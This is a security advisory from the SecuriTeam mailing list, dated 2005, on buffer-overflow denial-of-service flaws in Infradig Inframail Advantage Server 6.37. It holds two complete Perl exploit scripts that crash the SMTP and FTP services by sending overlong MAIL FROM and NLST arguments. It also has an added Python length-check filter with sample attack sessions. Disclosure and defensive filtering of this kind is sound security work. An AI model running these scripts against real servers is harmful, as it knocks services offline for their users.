[NEWS] Infradig Systems Inframail Advantage Server Multiple DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 06/30/05

    To: list@securiteam.com
    Date: 30 Jun 2005 15:21:35 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Infradig Systems Inframail Advantage Server Multiple DoS
    ------------------------------------------------------------------------

    SUMMARY

    Infradig <http://www.infradig.com/> servers are "servers that support
    SMTP, POP, IMAP, NNTP (NEWS), FTP, HTTP, WEBMAIL, WEBDAV, WAPMAIL, SIP,
    mailing-lists, calendars and document sharing".

    Lack of proper command filtering allows attackers to send a long string as
    a command, which causes a buffer overflow that crashes the Infradig
    server.

    DETAILS

    Vulnerable Systems:
     * Infradig Systems Advantage Server Edition version 6.37

    Immune Systems:
     * Infradig Systems Advantage Server Edition version 7.2

    The SMTP MAIL FROM: and FTP NLST commands are vulnerable to buffer
    overflow. Sending the character 'A' 40960 times as the argument to the
    MAIL FROM: command causes the ifmail.exe process to die and re-launch.

    Sending the character 'A' roughly 102400 times as the argument to the NLST
    command, and then sending the same NLST command a second time, causes all
    processes running under the ifmailsvc.exe process to die and re-launch
    (these processes include slapd.exe, slurpd.exe, ifmail.exe, ifweb.exe and
    others).
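
Both crashes described above depend on command lines far longer than either protocol needs, so a filtering proxy or log pipeline can flag them by length alone. The following is an added example, not part of the original advisory and not Infradig code: a per-connection guard that flags SMTP lines over the RFC 5321 limits (512-octet command line, 256-octet path) and FTP lines over an assumed local limit of 4096 octets (RFC 959 sets none). `LineGuard`, `scan` and the sample sessions are hypothetical names.

```python
SMTP_MAX_LINE = 512  # RFC 5321 4.5.3.1.4: command line, CRLF included
SMTP_MAX_PATH = 256  # RFC 5321 4.5.3.1.3: reverse-path / forward-path
FTP_MAX_LINE = 4096  # assumption: local policy; RFC 959 defines no limit


class LineGuard:
    """Hypothetical per-connection filter; buffers at most max_line + 1 bytes."""
    def __init__(self, protocol):
        self.protocol = protocol
        self.max_line = SMTP_MAX_LINE if protocol == "smtp" else FTP_MAX_LINE
        self.buf = bytearray()
        self.overlong = False  # True while skipping the rest of a flagged line

    def _check_complete(self):
        line = bytes(self.buf).strip()
        if self.protocol == "smtp" and line[:10].upper() == b"MAIL FROM:":
            path = line[10:].split(None, 1)[:1]  # ignore ESMTP parameters
            if path and len(path[0]) > SMTP_MAX_PATH:
                return [("MAIL", "reverse-path exceeds %d octets" % SMTP_MAX_PATH)]
        return []

    def feed(self, data):
        """Consume one received chunk; return a list of (verb, reason) findings."""
        findings, pos = [], 0
        while pos < len(data):
            nl = data.find(b"\n", pos)
            end = len(data) if nl < 0 else nl + 1
            if not self.overlong:
                room = self.max_line + 1 - len(self.buf)
                self.buf += data[pos:min(end, pos + room)]
                if len(self.buf) > self.max_line:  # flag before the line even ends
                    verb = bytes(self.buf[:16]).split(b" ")[0].decode("ascii", "replace")
                    findings.append((verb.upper(), "line exceeds %d octets" % self.max_line))
                    self.overlong = True
            if nl >= 0:  # end of line: run whole-line checks, then reset
                if not self.overlong:
                    findings += self._check_complete()
                self.buf, self.overlong = bytearray(), False
            pos = end
        return findings


def scan(protocol, chunks):
    guard = LineGuard(protocol)  # one guard per connection
    return [f for chunk in chunks for f in guard.feed(chunk)]

# Constructed sessions, using the argument lengths quoted in the advisory.
SMTP_SAMPLE = [b"HELO client.example\r\n", b"MAIL FROM:" + b"A" * 40960 + b"\r\n"]
FTP_SAMPLE = [b"NLST " + b"A" * 51200, b"A" * 51200 + b"\r\n", b"NOOP\r\n"]
```

Because `feed` reports as soon as the limit is crossed, a proxy built on it can drop the connection before the oversized argument reaches the mail or FTP process.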

    Vendor Status:
    The vendor has released a patch for Infradig Systems Advantage Server
    Edition.

    Exploit:
    Inframail_SMTPOverflow.pl
    #===== Start Inframail_SMTPOverflow.pl =====
    #
    # Usage: Inframail_SMTPOverflow.pl <ip>
    # Inframail_SMTPOverflow.pl 127.0.0.1
    #
    # Infradig Systems Inframail Advantage Server Edition 6.0
    # (Version: 6.37)
    #
    # Download:
    # http://www.infradig.com/
    #
    ##############################

    use IO::Socket;
    use strict;

    my($socket) = "";

    if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                        PeerPort => "25",
                                        Proto => "TCP"))
    {
            print "Attempting to kill Inframail SMTP server at $ARGV[0]:25...";

            sleep(1);

            print $socket "HELO moto.com\r\n";

            sleep(1);

            print $socket "MAIL FROM:" . "A" x 40960 . "\r\n";

            close($socket);
    }
    else
    {
            print "Cannot connect to $ARGV[0]:25\n";
    }

    # EOF

    Inframail_FTPOverflow.pl
    #
    # Usage: Inframail_FTPOverflow.pl <ip>
    # Inframail_FTPOverflow.pl 127.0.0.1
    #
    # Infradig Systems Inframail Advantage Server Edition 6.0
    # (Version: 6.37)
    #
    # Download:
    # http://www.infradig.com/
    #
    ##############################

    use IO::Socket;
    use strict;

    my($socket) = "";

    if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                        PeerPort => "21",
                                        Proto => "TCP"))
    {
            print "Attempting to kill Inframail FTP server at $ARGV[0]:21...";

            sleep(1);

            print $socket "USER hello\r\n";

            sleep(1);

            print $socket "PASS moto\r\n";

            sleep(1);

            print $socket "NLST " . "A" x 102400 . "\r\n";

            sleep(1);

            print $socket "NLST " . "A" x 102400 . "\r\n";

            close($socket);
    }
    else
    {
            print "Cannot connect to $ARGV[0]:21\n";
    }

    #EOF

    ADDITIONAL INFORMATION

    The information has been provided by Reed Arvin
    <mailto:reedarvin@gmail.com>.


    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

